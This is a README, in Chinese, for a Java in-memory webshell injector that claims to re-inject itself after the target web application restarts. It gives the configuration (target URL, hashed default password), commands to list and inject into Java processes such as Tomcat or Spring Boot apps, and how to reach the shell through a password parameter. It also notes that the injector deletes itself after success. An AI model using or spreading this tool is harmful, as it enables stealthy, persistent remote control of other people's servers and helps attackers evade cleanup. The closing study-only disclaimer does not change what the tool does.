Java內存馬注入工具

一個可以復活的Java內存馬

用法

1.先根據環境修改配置文件

配置文件位置在: agent_starter.jar內部config目錄下

# 目標url IP地址可以是127.0.0.1。在web應用關閉時，會掛起一個新進程用于監聽。當web應用重新啟動后，會自動重新注入。
target_url=http://127.0.0.1:80/
# 連接密碼的md5值 默認密碼:Jundead
password=AC9A489BB6873C5FB760370FD62A793E
# 調試模式 開啟后會在當前目錄創建日志文件，也會在目標web服務中打印少量日志信息。
debug=false

2.列出Java進程列表

java -jar agent_starter.jar list

3.根據進程名注入

java -jar agent_starter.jar

舉例：java -jar agent_starter.jar "SpringbootDemo.jar" 9

注入進程的displayName是SpringbootDemo.jar，使用的tomcat_version是9。

PS: tomcat容器的進程名一般是："org.apache.catalina.startup.Bootstrap start"

注入成功后會自動刪除自身。

4.連接webshell

瀏覽器訪問http://x.x.x.x/xxx?password=密碼

FAQ

• 注入成功了，但webshell不生效？

如果注入目標是Tomcat容器的應用，連接webshell的url必須是能夠正常訪問的url。如果注入目標是springboot框架應用，連接webshell的url可以是任意url。

Disclaimers

該項目僅供學習、研究之用，禁止用于非法用途。